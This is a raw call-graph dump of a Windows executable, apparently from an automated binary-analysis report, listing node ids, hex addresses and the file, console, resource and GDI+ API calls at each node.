23453->23458 23459 7ad81d RaiseException Concurrency::cancel_current_task CallUnexpected 23453->23459 23457->23453 23460->23321 23466 791705 23461->23466 23463 791378 23463->23331 23464->23337 23465->23336 23467 79171b 23466->23467 23478 791773 __vswprintf_c_l 23466->23478 23468 791744 23467->23468 23479 796dd3 67 API calls __vswprintf_c_l 23467->23479 23470 79179a 23468->23470 23474 791760 new 23468->23474 23472 7b20de 22 API calls 23470->23472 23471 79173a 23480 796e0b 68 API calls 23471->23480 23475 7917a1 23472->23475 23474->23478 23481 796e0b 68 API calls 23474->23481 23475->23478 23482 796e0b 68 API calls 23475->23482 23478->23463 23479->23471 23480->23468 23481->23478 23482->23478 23484 79ffe8 __vswprintf_c_l 23483->23484 23484->23341 23486 7918fb __EH_prolog 23485->23486 23487 791934 23486->23487 23489 791964 23486->23489 23493 79190f 23486->23493 23488 793a20 90 API calls 23487->23488 23488->23493 23494 793e69 23489->23494 23493->23344 23497 793e72 23494->23497 23495 793a20 90 API calls 23495->23497 23497->23495 23498 791980 23497->23498 23511 79f8f2 23497->23511 23498->23493 23499 791da1 23498->23499 23500 791dab __EH_prolog 23499->23500 23519 793aa3 23500->23519 23502 791dd4 23503 791705 69 API calls 23502->23503 23505 791e5b 23502->23505 23504 791deb 23503->23504 23549 79187c 69 API calls 23504->23549 23505->23493 23507 791e03 23508 791e0f 23507->23508 23550 7a06e9 MultiByteToWideChar 23507->23550 23551 79187c 69 API calls 23508->23551 23512 79f8f9 23511->23512 23513 79f914 23512->23513 23517 796dce RaiseException CallUnexpected 23512->23517 23515 79f925 SetThreadExecutionState 23513->23515 23518 796dce RaiseException CallUnexpected 23513->23518 23515->23497 23517->23513 23518->23515 23520 793aad __EH_prolog 23519->23520 23521 793adf 23520->23521 23522 793ac3 23520->23522 23523 793d1f 23521->23523 23527 793b0b 23521->23527 23588 796d0d 67 API calls 23522->23588 23607 796d0d 67 API calls 23523->23607 23526 793ace 23526->23502 23527->23526 23552 7a0be0 23527->23552 23529 793b43 23556 7a1fa9 23529->23556 23531 793b8c 23532 793c17 23531->23532 23548 793b83 23531->23548 23591 79c57d 23531->23591 23569 79a6a9 23532->23569 23533 793b88 23533->23531 23590 791fb8 69 API calls 23533->23590 23534 793b78 23589 796d0d 67 API calls 23534->23589 23535 793b5a 23535->23531 23535->23533 23535->23534 23537 793c2a 23542 793c9b 23537->23542 23543 793ca5 23537->23543 23573 7990d0 23542->23573 23597 7a1c40 23543->23597 23546 793ca3 23546->23548 23606 791f18 67 API calls 23546->23606 23584 7a0e21 23548->23584 23549->23507 23550->23508 23551->23505 23553 7a0bea __EH_prolog 23552->23553 23608 79fb02 23553->23608 23555 7a0cea 23555->23529 23557 7a1fb8 23556->23557 23559 7a1fc2 23556->23559 23627 796e0b 68 API calls 23557->23627 23560 7a2002 23559->23560 23562 7a2007 new 23559->23562 23568 7a2060 ___scrt_get_show_window_mode 23559->23568 23629 7b00ca RaiseException 23560->23629 23563 7a2117 23562->23563 23565 7a203c 23562->23565 23562->23568 23630 7b00ca RaiseException 23563->23630 23628 7a1eca 68 API calls 3 library calls 23565->23628 23566 7a213a 23568->23535 23568->23568 23570 79a6b6 23569->23570 23572 79a6c0 23569->23572 23571 7acdae new 8 API calls 23570->23571 23571->23572 23572->23537 23574 7990da __EH_prolog 23573->23574 23631 797c6b 23574->23631 23577 79135c 69 API calls 23578 7990ec 23577->23578 23634 79c658 23578->23634 23580 799146 23580->23546 23582 79c658 115 API calls 23583 7990fe 23582->23583 23583->23580 23583->23582 23643 79c810 91 API calls __vswprintf_c_l 23583->23643 23585 7a0e43 23584->23585 23650 79fc30 23585->23650 23587 7a0e5c 23587->23526 23588->23526 23589->23548 23590->23531 23592 79c59e 23591->23592 23593 79c5b0 23591->23593 23666 796195 73 API calls 23592->23666 23667 796195 73 API calls 23593->23667 23596 79c5a8 23596->23532 23598 7a1c49 23597->23598 23599 7a1c72 23597->23599 23601 7a1c68 23598->23601 23603 7a1c5e 23598->23603 23604 7a1c66 23598->23604 23599->23604 23682 7a421d 120 API calls 2 library calls 23599->23682 23681 7a4f35 115 API calls 23601->23681 23668 7a5984 23603->23668 23604->23546 23606->23548 23607->23526 23624 7acdf0 23608->23624 23610 79fb0c EnterCriticalSection 23611 79fb30 23610->23611 23622 79fb4e 23610->23622 23614 7acdae new 8 API calls 23611->23614 23612 79fb95 LeaveCriticalSection 23616 79fba1 23612->23616 23613 79fb66 23615 7acdae new 8 API calls 23613->23615 23617 79fb3a 23614->23617 23618 79fb70 23615->23618 23616->23555 23617->23622 23625 79f930 71 API calls 23617->23625 23619 79fb8a LeaveCriticalSection 23618->23619 23626 79f930 71 API calls 23618->23626 23619->23616 23622->23612 23622->23613 23623 79fb88 23623->23619 23624->23610 23625->23622 23626->23623 23627->23559 23628->23568 23629->23563 23630->23566 23632 79a8e0 GetVersionExW 23631->23632 23633 797c70 23632->23633 23633->23577 23637 79c66d __vswprintf_c_l 23634->23637 23635 79c7b7 23636 79c7df 23635->23636 23644 79c5f7 23635->23644 23639 79f8f2 2 API calls 23636->23639 23637->23635 23640 79c7ae 23637->23640 23648 79a791 85 API calls 23637->23648 23649 7a77e7 93 API calls 23637->23649 23639->23640 23640->23583 23643->23583 23645 79c651 23644->23645 23646 79c600 23644->23646 23645->23636 23646->23645 23647 7a0680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 23646->23647 23647->23645 23648->23637 23649->23637 23651 79fc39 EnterCriticalSection 23650->23651 23652 79fca2 23650->23652 23653 79fc75 23651->23653 23654 79fc57 23651->23654 23652->23587 23655 79f9d1 77 API calls 23653->23655 23656 79fc98 LeaveCriticalSection 23653->23656 23654->23653 23659 79f9d1 23654->23659 23657 79fc8f 23655->23657 23656->23652 23657->23656 23660 79fdc9 72 API calls 23659->23660 23661 79f9f3 ReleaseSemaphore 23660->23661 23662 79fa31 DeleteCriticalSection CloseHandle CloseHandle 23661->23662 23663 79fa13 23661->23663 23662->23653 23664 79fac7 70 API calls 23663->23664 23665 79fa1d CloseHandle 23664->23665 23665->23662 23665->23663 23666->23596 23667->23596 23683 7a21e6 23668->23683 23670 79c658 115 API calls 23678 7a5995 ___BuildCatchObject __vswprintf_c_l 23670->23678 23671 7a5d67 23701 7a3ef1 92 API calls __vswprintf_c_l 23671->23701 23673 7a5d77 __vswprintf_c_l 23673->23604 23678->23670 23678->23671 23687 79fa67 23678->23687 23693 7a2b3a 115 API calls 23678->23693 23694 7a5db9 115 API calls 23678->23694 23695 79fdc9 23678->23695 23699 7a2593 92 API calls __vswprintf_c_l 23678->23699 23700 7a63f2 120 API calls __vswprintf_c_l 23678->23700 23681->23604 23682->23604 23685 7a21f0 __EH_prolog ___scrt_get_show_window_mode new 23683->23685 23684 7a22db 23684->23678 23685->23684 23686 796e0b 68 API calls 23685->23686 23686->23685 23688 79fa78 23687->23688 23689 79fa73 23687->23689 23691 79fa91 23688->23691 23692 79fdc9 72 API calls 23688->23692 23690 79fbb1 77 API calls 23689->23690 23690->23688 23691->23678 23692->23691 23693->23678 23694->23678 23696 79fe0e 23695->23696 23697 79fde3 ResetEvent ReleaseSemaphore 23695->23697 23696->23678 23698 79fac7 70 API calls 23697->23698 23698->23696 23699->23678 23700->23678 23701->23673 23702->23354 23703->23354 23704->23352 23706 795da6 23705->23706 23751 795cc5 23706->23751 23708 795dd9 23710 795e1a 23708->23710 23711 795e11 23708->23711 23756 79a950 CharUpperW CompareStringW CompareStringW 23708->23756 23710->23711 23757 79f0e1 CompareStringW 23710->23757 23711->23366 23715 798116 23713->23715 23714 7981b7 CharUpperW 23716 7981ca 23714->23716 23715->23714 23716->23368 23718 797c20 23717->23718 23719 797c60 23718->23719 23763 796f49 67 API calls 23718->23763 23719->23377 23721 797c58 23764 796d0d 67 API calls 23721->23764 23724 799897 2 API calls 23723->23724 23725 79987d 23724->23725 23726 799888 23725->23726 23765 799b6a SetEndOfFile 23725->23765 23726->23403 23729 799a23 23728->23729 23730 799a32 23728->23730 23729->23730 23731 799a29 FlushFileBuffers 23729->23731 23732 799aab SetFileTime 23730->23732 23731->23730 23732->23432 23733->23358 23734->23361 23735->23387 23736->23377 23737->23377 23738->23374 23739->23390 23740->23381 23741->23390 23742->23400 23743->23402 23744->23418 23745->23418 23746->23418 23747->23418 23748->23427 23749->23428 23750->23435 23758 795bc2 23751->23758 23754 795ce6 23754->23708 23755 795bc2 3 API calls 23755->23754 23756->23708 23757->23711 23760 795bcc 23758->23760 23759 795cb4 23759->23754 23759->23755 23760->23759 23762 79a950 CharUpperW CompareStringW CompareStringW 23760->23762 23762->23760 23763->23721 23764->23719 23765->23726 23768 79a27d 23767->23768 23769 79a29b FindFirstFileW 23768->23769 23770 79a30d FindNextFileW 23768->23770 23771 79a2b4 23769->23771 23778 79a2f1 23769->23778 23772 79a318 GetLastError 23770->23772 23773 79a32c 23770->23773 23774 79b275 2 API calls 23771->23774 23772->23773 23773->23778 23775 79a2cd 23774->23775 23776 79a2d1 FindFirstFileW 23775->23776 23777 79a2e6 GetLastError 23775->23777 23776->23777 23776->23778 23777->23778 23778->23307 23779->23173 23780->23180 23781->23180 23782->23182 23783->23190 23785 799ba2 67 API calls 23784->23785 23786 791ee9 23785->23786 23787 791eed 23786->23787 23788 7919b1 90 API calls 23786->23788 23787->23198 23787->23199 23789 791efa 23788->23789 23789->23787 23791 796d0d 67 API calls 23789->23791 23791->23787 23911 7b1b40 5 API calls 2 library calls 23878 7a9646 92 API calls 23858 7a0d3a 26 API calls std::bad_exception::bad_exception 23816 7bf830 DeleteCriticalSection 23912 7ad736 20 API calls 23860 7aa537 93 API calls _swprintf 23861 7b5536 8 API calls ___vcrt_uninitialize 22153 7b6428 22161 7b784c 22153->22161 22156 7b643c 22158 7b6444 22159 7b6451 22158->22159 22169 7b6454 11 API calls 22158->22169 22170 7b7735 22161->22170 22164 7b788b TlsAlloc 22165 7b787c 22164->22165 22166 7ad783 _ValidateLocalCookies 5 API calls 22165->22166 22167 7b6432 22166->22167 22167->22156 22168 7b63a3 20 API calls 2 library calls 22167->22168 22168->22158 22169->22156 22171 7b7765 22170->22171 22174 7b7761 22170->22174 22171->22164 22171->22165 22172 7b7785 22172->22171 22175 7b7791 GetProcAddress 22172->22175 22174->22171 22174->22172 22177 7b77d1 22174->22177 22176 7b77a1 __crt_fast_encode_pointer 22175->22176 22176->22171 22178 7b77f2 LoadLibraryExW 22177->22178 22179 7b77e7 22177->22179 22180 7b780f GetLastError 22178->22180 22183 7b7827 22178->22183 22179->22174 22181 7b781a LoadLibraryExW 22180->22181 22180->22183 22181->22183 22182 7b783e FreeLibrary 22182->22179 22183->22179 22183->22182 23862 7a9123 73 API calls 23821 7ab820 72 API calls 22185 7ac726 19 API calls ___delayLoadHelper2@8 23822 791019 29 API calls pre_c_initialization 22268 7ad611 22269 7ad61d ___scrt_is_nonwritable_in_current_image 22268->22269 22294 7ad126 22269->22294 22271 7ad624 22273 7ad64d 22271->22273 22371 7ada75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 22271->22371 22282 7ad68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22273->22282 22305 7b572c 22273->22305 22277 7ad66c ___scrt_is_nonwritable_in_current_image 22278 7ad6ec 22313 7adb90 22278->22313 22282->22278 22372 7b4760 38 API calls 3 library calls 22282->22372 22289 7ad718 22291 7ad721 22289->22291 22373 7b4b67 28 API calls _abort 22289->22373 22374 7ad29d 13 API calls 2 library calls 22291->22374 22295 7ad12f 22294->22295 22375 7ad8cb IsProcessorFeaturePresent 22295->22375 22297 7ad13b 22376 7b0b66 22297->22376 22299 7ad140 22304 7ad144 22299->22304 22385 7b55b9 22299->22385 22301 7ad15b 22301->22271 22304->22271 22306 7b5743 22305->22306 22307 7ad783 _ValidateLocalCookies 5 API calls 22306->22307 22308 7ad666 22307->22308 22308->22277 22309 7b56d0 22308->22309 22310 7b56ff 22309->22310 22311 7ad783 _ValidateLocalCookies 5 API calls 22310->22311 22312 7b5728 22311->22312 22312->22282 22484 7adea0 22313->22484 22316 7ad6f2 22317 7b567d 22316->22317 22486 7b8558 22317->22486 22319 7ad6fb 22322 7ac131 22319->22322 22320 7b5686 22320->22319 22490 7b88e3 38 API calls 22320->22490 22611 79f353 22322->22611 22326 7ac150 22660 7a9036 22326->22660 22328 7ac159 22664 7a0722 GetCPInfo 22328->22664 22330 7ac163 ___scrt_get_show_window_mode 22331 7ac176 GetCommandLineW 22330->22331 22332 7ac203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 22331->22332 22333 7ac185 22331->22333 22334 793f5b _swprintf 51 API calls 22332->22334 22667 7aa8d4 22333->22667 22336 7ac26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 22334->22336 22680 7a9a76 LoadBitmapW 22336->22680 22339 7ac1fd 22674 7abe0a 22339->22674 22340 7ac193 OpenFileMappingW 22343 7ac1ac MapViewOfFile 22340->22343 22344 7ac1f3 CloseHandle 22340->22344 22346 7ac1ea UnmapViewOfFile 22343->22346 22347 7ac1bd __vswprintf_c_l 22343->22347 22344->22332 22346->22344 22348 7abe0a 2 API calls 22347->22348 22350 7ac1d9 22348->22350 22349 7ac2b3 22351 7ac2c5 DialogBoxParamW 22349->22351 22350->22346 22352 7ac2ff 22351->22352 22353 7ac318 22352->22353 22354 7ac311 Sleep 22352->22354 22356 7ac326 22353->22356 22705 7a9237 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 22353->22705 22354->22353 22357 7ac345 DeleteObject 22356->22357 22358 7ac35f 22357->22358 22359 7ac35c DeleteObject 22357->22359 22360 7ac3a2 22358->22360 22361 7ac390 22358->22361 22359->22358 22703 7a909e 22360->22703 22706 7abe69 WaitForSingleObject PeekMessageW WaitForSingleObject 22361->22706 22363 7ac396 CloseHandle 22363->22360 22365 7ac3dc 22366 7b4a9b GetModuleHandleW 22365->22366 22367 7ad70e 22366->22367 22367->22289 22368 7b4bc4 22367->22368 22860 7b4941 22368->22860 22371->22271 22372->22278 22373->22291 22374->22277 22375->22297 22377 7b0b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 22376->22377 22389 7b1c0e 22377->22389 22380 7b0b79 22380->22299 22382 7b0b81 22383 7b0b8c 22382->22383 22403 7b1c4a DeleteCriticalSection 22382->22403 22383->22299 22431 7b8ac5 22385->22431 22388 7b0b8f 8 API calls 3 library calls 22388->22304 22390 7b1c17 22389->22390 22392 7b1c40 22390->22392 22394 7b0b75 22390->22394 22404 7b1e85 22390->22404 22409 7b1c4a DeleteCriticalSection 22392->22409 22394->22380 22395 7b0ca6 22394->22395 22424 7b1d9a 22395->22424 22397 7b0cb0 22402 7b0cbb 22397->22402 22429 7b1e48 6 API calls try_get_function 22397->22429 22399 7b0cc9 22400 7b0cd6 22399->22400 22430 7b0cd9 6 API calls ___vcrt_FlsFree 22399->22430 22400->22382 22402->22382 22403->22380 22410 7b1c79 22404->22410 22407 7b1ebc InitializeCriticalSectionAndSpinCount 22408 7b1ea8 22407->22408 22408->22390 22409->22394 22411 7b1ca9 22410->22411 22412 7b1cad 22410->22412 22411->22412 22416 7b1ccd 22411->22416 22417 7b1d19 22411->22417 22412->22407 22412->22408 22414 7b1cd9 GetProcAddress 22415 7b1ce9 __crt_fast_encode_pointer 22414->22415 22415->22412 22416->22412 22416->22414 22418 7b1d41 LoadLibraryExW 22417->22418 22419 7b1d36 22417->22419 22420 7b1d5d GetLastError 22418->22420 22422 7b1d75 22418->22422 22419->22411 22421 7b1d68 LoadLibraryExW 22420->22421 22420->22422 22421->22422 22422->22419 22423 7b1d8c FreeLibrary 22422->22423 22423->22419 22425 7b1c79 try_get_function 5 API calls 22424->22425 22426 7b1db4 22425->22426 22427 7b1dcc TlsAlloc 22426->22427 22428 7b1dbd 22426->22428 22428->22397 22429->22399 22430->22402 22432 7b8ae2 22431->22432 22435 7b8ade 22431->22435 22432->22435 22437 7b71c0 22432->22437 22433 7ad783 _ValidateLocalCookies 5 API calls 22434 7ad14d 22433->22434 22434->22301 22434->22388 22435->22433 22438 7b71cc ___scrt_is_nonwritable_in_current_image 22437->22438 22449 7b76d6 EnterCriticalSection 22438->22449 22440 7b71d3 22450 7b8f93 22440->22450 22442 7b71e2 22448 7b71f1 22442->22448 22463 7b7054 29 API calls 22442->22463 22445 7b7202 ___scrt_is_nonwritable_in_current_image 22445->22432 22446 7b71ec 22464 7b710a GetStdHandle GetFileType 22446->22464 22465 7b720d LeaveCriticalSection _abort 22448->22465 22449->22440 22451 7b8f9f ___scrt_is_nonwritable_in_current_image 22450->22451 22452 7b8fac 22451->22452 22453 7b8fc3 22451->22453 22474 7b5e3e 20 API calls _abort 22452->22474 22466 7b76d6 EnterCriticalSection 22453->22466 22456 7b8fb1 22475 7b5d1d 26 API calls _abort 22456->22475 22459 7b8fbb ___scrt_is_nonwritable_in_current_image 22459->22442 22461 7b8ffb 22476 7b9022 LeaveCriticalSection _abort 22461->22476 22462 7b8fcf 22462->22461 22467 7b8ee4 22462->22467 22463->22446 22464->22448 22465->22445 22466->22462 22468 7b5a8d _abort 20 API calls 22467->22468 22469 7b8ef6 22468->22469 22473 7b8f03 22469->22473 22477 7b79a7 22469->22477 22470 7b59c2 _free 20 API calls 22472 7b8f55 22470->22472 22472->22462 22473->22470 22474->22456 22475->22459 22476->22459 22478 7b7735 _abort 5 API calls 22477->22478 22479 7b79ce 22478->22479 22480 7b79ec InitializeCriticalSectionAndSpinCount 22479->22480 22481 7b79d7 22479->22481 22480->22481 22482 7ad783 _ValidateLocalCookies 5 API calls 22481->22482 22483 7b7a03 22482->22483 22483->22469 22485 7adba3 GetStartupInfoW 22484->22485 22485->22316 22487 7b856a 22486->22487 22488 7b8561 22486->22488 22487->22320 22491 7b8457 22488->22491 22490->22320 22492 7b631f _abort 38 API calls 22491->22492 22493 7b8464 22492->22493 22511 7b8576 22493->22511 22495 7b846c 22520 7b81eb 22495->22520 22498 7b8483 22498->22487 22499 7b59fc __vswprintf_c_l 21 API calls 22500 7b8494 22499->22500 22501 7b84c6 22500->22501 22527 7b8618 22500->22527 22504 7b59c2 _free 20 API calls 22501->22504 22504->22498 22505 7b84c1 22537 7b5e3e 20 API calls _abort 22505->22537 22507 7b850a 22507->22501 22538 7b80c1 26 API calls 22507->22538 22508 7b84de 22508->22507 22509 7b59c2 _free 20 API calls 22508->22509 22509->22507 22512 7b8582 ___scrt_is_nonwritable_in_current_image 22511->22512 22513 7b631f _abort 38 API calls 22512->22513 22514 7b858c 22513->22514 22517 7b8610 ___scrt_is_nonwritable_in_current_image 22514->22517 22519 7b59c2 _free 20 API calls 22514->22519 22539 7b5a4a 38 API calls _abort 22514->22539 22540 7b76d6 EnterCriticalSection 22514->22540 22541 7b8607 LeaveCriticalSection _abort 22514->22541 22517->22495 22519->22514 22521 7b2636 __fassign 38 API calls 22520->22521 22522 7b81fd 22521->22522 22523 7b821e 22522->22523 22524 7b820c GetOEMCP 22522->22524 22525 7b8235 22523->22525 22526 7b8223 GetACP 22523->22526 22524->22525 22525->22498 22525->22499 22526->22525 22528 7b81eb 40 API calls 22527->22528 22529 7b8637 22528->22529 22531 7b8688 IsValidCodePage 22529->22531 22534 7b863e 22529->22534 22535 7b86ad ___scrt_get_show_window_mode 22529->22535 22530 7ad783 _ValidateLocalCookies 5 API calls 22532 7b84b9 22530->22532 22533 7b869a GetCPInfo 22531->22533 22531->22534 22532->22505 22532->22508 22533->22534 22533->22535 22534->22530 22542 7b82c3 GetCPInfo 22535->22542 22537->22501 22538->22501 22540->22514 22541->22514 22547 7b82fd 22542->22547 22551 7b83a7 22542->22551 22544 7ad783 _ValidateLocalCookies 5 API calls 22546 7b8453 22544->22546 22546->22534 22552 7b93f3 22547->22552 22550 7b75cb __vswprintf_c_l 43 API calls 22550->22551 22551->22544 22553 7b2636 __fassign 38 API calls 22552->22553 22554 7b9413 MultiByteToWideChar 22553->22554 22556 7b94e9 22554->22556 22557 7b9451 22554->22557 22558 7ad783 _ValidateLocalCookies 5 API calls 22556->22558 22560 7b59fc __vswprintf_c_l 21 API calls 22557->22560 22562 7b9472 __vswprintf_c_l ___scrt_get_show_window_mode 22557->22562 22561 7b835e 22558->22561 22559 7b94e3 22571 7b7616 20 API calls _free 22559->22571 22560->22562 22566 7b75cb 22561->22566 22562->22559 22564 7b94b7 MultiByteToWideChar 22562->22564 22564->22559 22565 7b94d3 GetStringTypeW 22564->22565 22565->22559 22567 7b2636 __fassign 38 API calls 22566->22567 22568 7b75de 22567->22568 22572 7b73ae 22568->22572 22571->22556 22574 7b73c9 __vswprintf_c_l 22572->22574 22573 7b73ef MultiByteToWideChar 22575 7b7419 22573->22575 22576 7b75a3 22573->22576 22574->22573 22579 7b59fc __vswprintf_c_l 21 API calls 22575->22579 22581 7b743a __vswprintf_c_l 22575->22581 22577 7ad783 _ValidateLocalCookies 5 API calls 22576->22577 22578 7b75b6 22577->22578 22578->22550 22579->22581 22580 7b7483 MultiByteToWideChar 22582 7b749c 22580->22582 22595 7b74ef 22580->22595 22581->22580 22581->22595 22599 7b7a09 22582->22599 22586 7b74fe 22590 7b59fc __vswprintf_c_l 21 API calls 22586->22590 22593 7b751f __vswprintf_c_l 22586->22593 22587 7b74c6 22589 7b7a09 __vswprintf_c_l 11 API calls 22587->22589 22587->22595 22588 7b7594 22607 7b7616 20 API calls _free 22588->22607 22589->22595 22590->22593 22591 7b7a09 __vswprintf_c_l 11 API calls 22594 7b7573 22591->22594 22593->22588 22593->22591 22594->22588 22596 7b7582 WideCharToMultiByte 22594->22596 22608 7b7616 20 API calls _free 22595->22608 22596->22588 22597 7b75c2 22596->22597 22609 7b7616 20 API calls _free 22597->22609 22600 7b7735 _abort 5 API calls 22599->22600 22601 7b7a30 22600->22601 22604 7b7a39 22601->22604 22610 7b7a91 10 API calls 3 library calls 22601->22610 22603 7b7a79 LCMapStringW 22603->22604 22605 7ad783 _ValidateLocalCookies 5 API calls 22604->22605 22606 7b74b3 22605->22606 22606->22586 22606->22587 22606->22595 22607->22595 22608->22576 22609->22595 22610->22603 22612 7acec0 22611->22612 22613 79f35d GetModuleHandleW 22612->22613 22614 79f3c8 22613->22614 22615 79f377 GetProcAddress 22613->22615 22616 79f6fd GetModuleFileNameW 22614->22616 22716 7b462a 42 API calls __vswprintf_c_l 22614->22716 22617 79f3a0 GetProcAddress 22615->22617 22618 79f390 22615->22618 22629 79f718 22616->22629 22617->22614 22619 79f3ac 22617->22619 22618->22617 22619->22614 22621 79f63b 22621->22616 22622 79f646 GetModuleFileNameW CreateFileW 22621->22622 22623 79f6f1 CloseHandle 22622->22623 22624 79f675 SetFilePointer 22622->22624 22623->22616 22624->22623 22625 79f685 ReadFile 22624->22625 22625->22623 22627 79f6a4 22625->22627 22627->22623 22631 79f309 2 API calls 22627->22631 22630 79f74d CompareStringW 22629->22630 22632 79f783 GetFileAttributesW 22629->22632 22633 79f797 22629->22633 22707 79a8e0 22629->22707 22710 79f309 22629->22710 22630->22629 22631->22627 22632->22629 22632->22633 22634 79f7a4 22633->22634 22636 79f7d6 22633->22636 22637 79f7bc GetFileAttributesW 22634->22637 22639 79f7d0 22634->22639 22635 79f8e5 22659 7a8b8e GetCurrentDirectoryW 22635->22659 22636->22635 22638 79a8e0 GetVersionExW 22636->22638 22637->22634 22637->22639 22640 79f7f0 22638->22640 22639->22636 22641 79f85d 22640->22641 22642 79f7f7 22640->22642 22643 793f5b _swprintf 51 API calls 22641->22643 22644 79f309 2 API calls 22642->22644 22645 79f885 AllocConsole 22643->22645 22646 79f801 22644->22646 22647 79f8dd ExitProcess 22645->22647 22648 79f892 GetCurrentProcessId AttachConsole 22645->22648 22649 79f309 2 API calls 22646->22649 22717 7b20b3 22648->22717 22651 79f80b 22649->22651 22653 79d142 54 API calls 22651->22653 22652 79f8b3 GetStdHandle WriteConsoleW Sleep FreeConsole 22652->22647 22654 79f826 22653->22654 22655 793f5b _swprintf 51 API calls 22654->22655 22656 79f839 22655->22656 22657 79d142 54 API calls 22656->22657 22658 79f848 22657->22658 22658->22647 22659->22326 22661 79f309 2 API calls 22660->22661 22662 7a904a OleInitialize 22661->22662 22663 7a906d GdiplusStartup SHGetMalloc 22662->22663 22663->22328 22665 7a0746 IsDBCSLeadByte 22664->22665 22665->22665 22666 7a075e 22665->22666 22666->22330 22670 7aa8de 22667->22670 22668 7aa9f4 22668->22339 22668->22340 22669 7aa926 CharUpperW 22669->22670 22670->22668 22670->22669 22671 7aa9a9 CharUpperW 22670->22671 22673 7aa94d CharUpperW 22670->22673 22719 79dfde 73 API calls ___scrt_get_show_window_mode 22670->22719 22671->22670 22673->22670 22675 7acec0 22674->22675 22676 7abe17 SetEnvironmentVariableW 22675->22676 22677 7abe3a 22676->22677 22678 7abe62 22677->22678 22679 7abe56 SetEnvironmentVariableW 22677->22679 22678->22332 22679->22678 22681 7a9aa0 GetObjectW 22680->22681 22682 7a9a97 22680->22682 22720 7a8ac0 22681->22720 22725 7a8bd0 FindResourceW 22682->22725 22687 7a9af3 22698 79caa7 22687->22698 22688 7a9ad3 22741 7a8b22 GetDC GetDeviceCaps ReleaseDC 22688->22741 22690 7a8bd0 13 API calls 22692 7a9ac8 22690->22692 22691 7a9adb 22742 7a8adf GetDC GetDeviceCaps ReleaseDC 22691->22742 22692->22688 22694 7a9ace DeleteObject 22692->22694 22694->22688 22695 7a9ae4 22743 7a8cf3 8 API calls ___scrt_get_show_window_mode 22695->22743 22697 7a9aeb DeleteObject 22697->22687 22754 79cacc 22698->22754 22702 79caba 22702->22349 22704 7a90c4 GdiplusShutdown CoUninitialize 22703->22704 22704->22365 22705->22356 22706->22363 22708 79a8f4 GetVersionExW 22707->22708 22709 79a930 22707->22709 22708->22709 22709->22629 22711 7acec0 22710->22711 22712 79f316 GetSystemDirectoryW 22711->22712 22713 79f34c 22712->22713 22714 79f32e 22712->22714 22713->22629 22715 79f33f LoadLibraryW 22714->22715 22715->22713 22716->22621 22718 7b20bb 22717->22718 22718->22652 22718->22718 22719->22670 22744 7a8adf GetDC GetDeviceCaps ReleaseDC 22720->22744 22722 7a8ac7 22723 7a8ad3 22722->22723 22745 7a8b22 GetDC GetDeviceCaps ReleaseDC 22722->22745 22723->22687 22723->22688 22723->22690 22726 7a8bf1 SizeofResource 22725->22726 22730 7a8c23 22725->22730 22727 7a8c05 LoadResource 22726->22727 22726->22730 22728 7a8c16 LockResource 22727->22728 22727->22730 22729 7a8c2a GlobalAlloc 22728->22729 22728->22730 22729->22730 22731 7a8c41 GlobalLock 22729->22731 22730->22681 22732 7a8cb8 GlobalFree 22731->22732 22733 7a8c4c __vswprintf_c_l 22731->22733 22732->22730 22734 7a8c54 CreateStreamOnHGlobal 22733->22734 22735 7a8c6c 22734->22735 22736 7a8cb1 GlobalUnlock 22734->22736 22746 7a8b65 GdipAlloc 22735->22746 22736->22732 22739 7a8ca6 22739->22736 22740 7a8c90 GdipCreateHBITMAPFromBitmap 22740->22739 22741->22691 22742->22695 22743->22697 22744->22722 22745->22723 22747 7a8b77 22746->22747 22748 7a8b84 22746->22748 22750 7a8924 22747->22750 22748->22736 22748->22739 22748->22740 22751 7a894c GdipCreateBitmapFromStream 22750->22751 22752 7a8945 GdipCreateBitmapFromStreamICM 22750->22752 22753 7a8951 22751->22753 22752->22753 22753->22748 22755 79cad6 _wcschr __EH_prolog 22754->22755 22756 79cb02 GetModuleFileNameW 22755->22756 22757 79cb33 22755->22757 22758 79cb1c 22756->22758 22777 79973d 22757->22777 22758->22757 22761 79cc9f 22763 7999e0 70 API calls 22761->22763 22772 79cce9 22761->22772 22766 79ccb9 new 22763->22766 22767 79990d 73 API calls 22766->22767 22766->22772 22770 79ccdf new 22767->22770 22769 79cb63 22769->22761 22769->22772 22786 799aeb 22769->22786 22801 79990d 22769->22801 22809 7999e0 22769->22809 22770->22772 22814 7a06e9 MultiByteToWideChar 22770->22814 22794 799437 22772->22794 22773 79ce48 GetModuleHandleW FindResourceW 22774 79ce76 22773->22774 22776 79ce70 22773->22776 22775 79c91f 52 API calls 22774->22775 22775->22776 22776->22702 22778 799747 22777->22778 22779 79979d CreateFileW 22778->22779 22780 7997ca GetLastError 22779->22780 22781 79981b 22779->22781 22782 79b275 2 API calls 22780->22782 22781->22769 22783 7997ea 22782->22783 22783->22781 22784 7997ee CreateFileW GetLastError 22783->22784 22785 799812 22784->22785 22785->22781 22787 799b0f SetFilePointer 22786->22787 22788 799afe 22786->22788 22789 799b48 22787->22789 22790 799b2d GetLastError 22787->22790 22788->22789 22815 796eae 68 API calls 22788->22815 22789->22769 22790->22789 22792 799b37 22790->22792 22792->22789 22816 796eae 68 API calls 22792->22816 22795 79945b 22794->22795 22796 79946c 22794->22796 22795->22796 22797 79946e 22795->22797 22798 799467 22795->22798 22796->22773 22822 7994a3 22797->22822 22817 7995ea 22798->22817 22804 799924 22801->22804 22803 799985 22803->22769 22804->22803 22805 799977 22804->22805 22807 799987 22804->22807 22837 799613 22804->22837 22849 796e74 68 API calls 22805->22849 22807->22803 22808 799613 5 API calls 22807->22808 22808->22807 22854 799897 22809->22854 22812 799a0b 22812->22769 22814->22772 22815->22787 22816->22789 22818 7995f3 22817->22818 22819 7995f7 22817->22819 22818->22796 22819->22818 22828 799dac 22819->22828 22823 7994af 22822->22823 22824 7994cd 22822->22824 22823->22824 22826 7994bb CloseHandle 22823->22826 22825 7994ec 22824->22825 22836 796d80 67 API calls 22824->22836 22825->22796 22826->22824 22829 7acec0 22828->22829 22830 799db9 DeleteFileW 22829->22830 22831 799dcc 22830->22831 22832 799611 22830->22832 22833 79b275 2 API calls 22831->22833 